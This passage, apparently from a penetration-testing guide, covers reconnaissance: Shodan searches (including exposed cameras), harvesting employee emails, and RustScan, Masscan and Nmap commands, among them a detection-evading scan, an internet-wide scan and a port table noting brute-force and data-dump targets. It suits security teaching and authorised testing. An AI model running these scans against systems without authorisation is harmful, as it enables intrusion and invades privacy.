&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="shodan-for-infrastructure" &gt;
&lt;div&gt;
&lt;a href="#shodan-for-infrastructure"&gt;
##
&lt;/a&gt;
Shodan (for infrastructure)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Port statistics by ASN/ISP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shodan stats --facets port --limit &lt;span style="color:#ef9f76"&gt;20&lt;/span&gt; org:&lt;span style="color:#a6d189"&gt;&amp;#34;ISP NAME&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Search by specific banner&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shodan search &lt;span style="color:#a6d189"&gt;&amp;#34;Apache/2.4.62&amp;#34;&lt;/span&gt; --fields ip_str,port,org
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Search cameras in a range&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;shodan search --fields ip_str,port,org net:187.0.0.0/8 has_screenshot:true
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="emails-and-people" &gt;
&lt;div&gt;
&lt;a href="#emails-and-people"&gt;
##
&lt;/a&gt;
Emails and People
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# hunter.io for domain email patterns&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# haveibeenpwned.com to check leaked emails&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# LinkedIn + Google to map employees (firstname.lastname@target.com)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="4-active-reconnaissance--nmap-masscan-and-rustscan" &gt;
&lt;div&gt;
&lt;a href="#4-active-reconnaissance--nmap-masscan-and-rustscan"&gt;
#
&lt;/a&gt;
4. ACTIVE RECONNAISSANCE — NMAP, MASSCAN AND RUSTSCAN
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="41-rustscan--fast-port-scanner" &gt;
&lt;div&gt;
&lt;a href="#41-rustscan--fast-port-scanner"&gt;
##
&lt;/a&gt;
4.1 RustScan — Fast Port Scanner
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;RustScan is ideal for individual targets or small ranges; it is extremely fast (3s for 1000 ports).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Installation (Docker)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker pull rustscan/rustscan:2.1.1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;alias&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;rustscan&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;docker run -it --rm --name rustscan rustscan/rustscan:2.1.1&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Cargo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cargo install rustscan
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;export&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;PATH&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOME&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/.cargo/bin:&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$PATH&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="essential-commands" &gt;
&lt;div&gt;
&lt;a href="#essential-commands"&gt;
###
&lt;/a&gt;
Essential Commands
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Fast scan of common ports&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rustscan -a 192.168.1.1 -p 21,22,25,80,443,3306,5432,6379,8080,8443 --ulimit &lt;span style="color:#ef9f76"&gt;5000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Full scan + Nmap version enumeration&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rustscan -a 192.168.1.1 -r 1-10000 -t &lt;span style="color:#ef9f76"&gt;500&lt;/span&gt; -b &lt;span style="color:#ef9f76"&gt;1500&lt;/span&gt; --ulimit &lt;span style="color:#ef9f76"&gt;5000&lt;/span&gt; -- -sC -sV
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# /24 range scan&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rustscan -a 192.168.1.0/24 --ulimit &lt;span style="color:#ef9f76"&gt;5000&lt;/span&gt; -g
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Greppable output (easy to parse)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rustscan -a target.com -r 1-10000 -g | grep &lt;span style="color:#a6d189"&gt;&amp;#34;Open&amp;#34;&lt;/span&gt; | cut -d&lt;span style="color:#a6d189"&gt;&amp;#39; &amp;#39;&lt;/span&gt; -f2 &amp;gt; open_ports.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Performance&lt;/strong&gt;: RustScan ~3s vs curl loop ~20min for 1000 ports (&lt;strong&gt;400x gain&lt;/strong&gt;).&lt;/p&gt;
&lt;h3 id="42-masscan--internet-scale-scanner" &gt;
&lt;div&gt;
&lt;a href="#42-masscan--internet-scale-scanner"&gt;
##
&lt;/a&gt;
4.2 Masscan — Internet-Scale Scanner
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Masscan is for massive ranges (/8, /0); it can scan the entire Internet for one port in 5 minutes.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Installation (from source)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#99d1db"&gt;cd&lt;/span&gt; masscan &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; make -j&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;nproc&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;sudo make install
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="essential-flags" &gt;
&lt;div&gt;
&lt;a href="#essential-flags"&gt;
###
&lt;/a&gt;
Essential Flags
&lt;/div&gt;
&lt;/h4&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Flag&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-p&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Ports (required)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;-p80,443,8000-8100&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--rate&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Packets/second (default 100, max ~1.6M)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;--rate 100000&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-oL&lt;/code&gt;/&lt;code&gt;-oJ&lt;/code&gt;/&lt;code&gt;-oG&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Output (list/JSON/grepable)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;-oJ scan.json&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--open&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Open ports only&lt;/td&gt;
&lt;td&gt;&lt;code&gt;--open&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--banners&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Banner grabbing&lt;/td&gt;
&lt;td&gt;&lt;code&gt;--banners&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--source-ip&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Source IP (for banner grabbing)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;--source-ip 192.168.1.200&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--shard&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Splits scan across N machines&lt;/td&gt;
&lt;td&gt;&lt;code&gt;--shard 1/5&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;--resume&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Resumes interrupted scan&lt;/td&gt;
&lt;td&gt;&lt;code&gt;--resume paused.paused&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-iL&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;IP list from file&lt;/td&gt;
&lt;td&gt;&lt;code&gt;-iL targets.txt&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h4 id="essential-commands-1" &gt;
&lt;div&gt;
&lt;a href="#essential-commands-1"&gt;
###
&lt;/a&gt;
Essential Commands
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Fast scan of common ports in subnet&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;masscan 192.168.1.0/24 -p80,443,22,21,8080,8443,3306,5432 --rate &lt;span style="color:#ef9f76"&gt;10000&lt;/span&gt; -oL scan.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Full scan of 1 host&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;masscan 187.62.129.47 -p1-65535 --rate &lt;span style="color:#ef9f76"&gt;10000&lt;/span&gt; -oJ full.json
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Banner grabbing (requires --source-ip)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;masscan 10.0.0.0/8 -p80,443,22 --banners --source-ip 192.168.1.200 --rate &lt;span style="color:#ef9f76"&gt;5000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Sharding (4 machines, each scanning 25%)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;masscan 0.0.0.0/0 -p80,443 --rate &lt;span style="color:#ef9f76"&gt;100000&lt;/span&gt; --shard 1/4 -oB shard1.bin
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="output-parsing" &gt;
&lt;div&gt;
&lt;a href="#output-parsing"&gt;
###
&lt;/a&gt;
Output Parsing
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# JSON → IP:port&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jq -r &lt;span style="color:#a6d189"&gt;&amp;#39;.[] | &amp;#34;\(.ip):\(.ports[0].port)&amp;#34;&amp;#39;&lt;/span&gt; scan.json | sort -u
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Grepable → IP:port&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep &lt;span style="color:#a6d189"&gt;&amp;#34;open&amp;#34;&lt;/span&gt; scan.grep | awk &lt;span style="color:#a6d189"&gt;&amp;#39;{print $2&amp;#34;:&amp;#34;$5}&amp;#39;&lt;/span&gt; | tr &lt;span style="color:#a6d189"&gt;&amp;#39;/&amp;#39;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39; &amp;#39;&lt;/span&gt; | awk &lt;span style="color:#a6d189"&gt;&amp;#39;{print $1&amp;#34;:&amp;#34;$3}&amp;#39;&lt;/span&gt; | sort -u
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List → filter open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep &lt;span style="color:#a6d189"&gt;&amp;#34;^open&amp;#34;&lt;/span&gt; scan.txt | awk &lt;span style="color:#a6d189"&gt;&amp;#39;{print $4&amp;#34;:&amp;#34;$3}&amp;#39;&lt;/span&gt; | sort -u
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="43-nmap--deep-enumeration" &gt;
&lt;div&gt;
&lt;a href="#43-nmap--deep-enumeration"&gt;
##
&lt;/a&gt;
4.3 Nmap — Deep Enumeration
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Nmap is for detailed analysis of already discovered hosts.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Full enumeration of 1 host&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;nmap -sV -sC -O -p- --reason target.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Stealth scan (slower, less detectable)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;nmap -sS -Pn -n -T2 --max-retries &lt;span style="color:#ef9f76"&gt;2&lt;/span&gt; -p 1-1000 target.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# OS detection&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;nmap -O target.com
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Specific NSE scripts&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;nmap --script http-enum,http-headers,ssl-enum-ciphers target.com
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="44-decision-rule--which-scanner-to-use" &gt;
&lt;div&gt;
&lt;a href="#44-decision-rule--which-scanner-to-use"&gt;
##
&lt;/a&gt;
4.4 Decision Rule — Which Scanner to Use?
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Why&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Single target, ~1000 ports&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;RustScan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Fastest (3s)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Range /24 (254 hosts)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Masscan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;2s at 10k pps&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Range /8 or larger&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Masscan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Only one that handles the scale&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Deep enumeration (1 host)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Nmap&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;NSE scripts, OS detection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Mass banner grabbing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Masscan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Custom TCP stack&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Unstable network, packet loss&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Nmap&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Smart retry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Pipeline + Nmap&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;RustScan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Automatic pipe &lt;code&gt;-- -sV -sC&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id="45-integrated-pipeline" &gt;
&lt;div&gt;
&lt;a href="#45-integrated-pipeline"&gt;
##
&lt;/a&gt;
4.5 Integrated Pipeline
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Fast masscan to find hosts + ports&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;masscan 10.0.0.0/24 -p1-65535 --rate &lt;span style="color:#ef9f76"&gt;10000&lt;/span&gt; -oJ masscan_out.json
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Extract IP:port from open ones&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jq -r &lt;span style="color:#a6d189"&gt;&amp;#39;.[] | &amp;#34;\(.ip):\(.ports[0].port)&amp;#34;&amp;#39;&lt;/span&gt; masscan_out.json | sort -u &amp;gt; alive.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Deep nmap only on confirmed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;IFS&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;: &lt;span style="color:#99d1db"&gt;read&lt;/span&gt; ip port; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; nmap -sV -sC -p &lt;span style="color:#f2d5cf"&gt;$port&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;$ip&lt;/span&gt; -oN nmap_&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;ip&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;_&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;port&lt;/span&gt;&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt; &amp;lt; alive.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="ports-and-their-meanings-in-a-pentest-context" &gt;
&lt;div&gt;
&lt;a href="#ports-and-their-meanings-in-a-pentest-context"&gt;
##
&lt;/a&gt;
Ports and Their Meanings in a Pentest Context
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Port&lt;/th&gt;
&lt;th&gt;Service&lt;/th&gt;
&lt;th&gt;What to look for&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;21&lt;/td&gt;
&lt;td&gt;FTP&lt;/td&gt;
&lt;td&gt;Anonymous login, credentials in files&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;22&lt;/td&gt;
&lt;td&gt;SSH&lt;/td&gt;
&lt;td&gt;Version, brute force, key-based auth&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;80/443&lt;/td&gt;
&lt;td&gt;HTTP/HTTPS&lt;/td&gt;
&lt;td&gt;.env, .git, APIs, admin panels&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3000&lt;/td&gt;
&lt;td&gt;Coolify/Grafana&lt;/td&gt;
&lt;td&gt;Deploy panel, metrics&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3306&lt;/td&gt;
&lt;td&gt;MySQL&lt;/td&gt;
&lt;td&gt;Exposed without firewall, brute force, EOL CVEs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5000&lt;/td&gt;
&lt;td&gt;Flask/Werkzeug&lt;/td&gt;
&lt;td&gt;Debug console, endpoints without auth&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5432&lt;/td&gt;
&lt;td&gt;PostgreSQL&lt;/td&gt;
&lt;td&gt;Exposed, credentials in .env&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6379&lt;/td&gt;
&lt;td&gt;Redis&lt;/td&gt;
&lt;td&gt;No password, cached data&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8080&lt;/td&gt;
&lt;td&gt;HTTP alt&lt;/td&gt;
&lt;td&gt;Config different from port 80, Tomcat, Jenkins&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8443&lt;/td&gt;
&lt;td&gt;HTTPS alt&lt;/td&gt;
&lt;td&gt;Direct Apache (bypass nginx), Tomcat&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9000/9001&lt;/td&gt;
&lt;td&gt;MinIO/S3&lt;/td&gt;
&lt;td&gt;Public storage, upload without auth&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9090&lt;/td&gt;
&lt;td&gt;Prometheus&lt;/td&gt;
&lt;td&gt;Metrics, internal endpoints&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9200&lt;/td&gt;
&lt;td&gt;Elasticsearch&lt;/td&gt;
&lt;td&gt;No auth, index dump&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;27017&lt;/td&gt;
&lt;td&gt;MongoDB&lt;/td&gt;
&lt;td&gt;No auth, collection dump&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
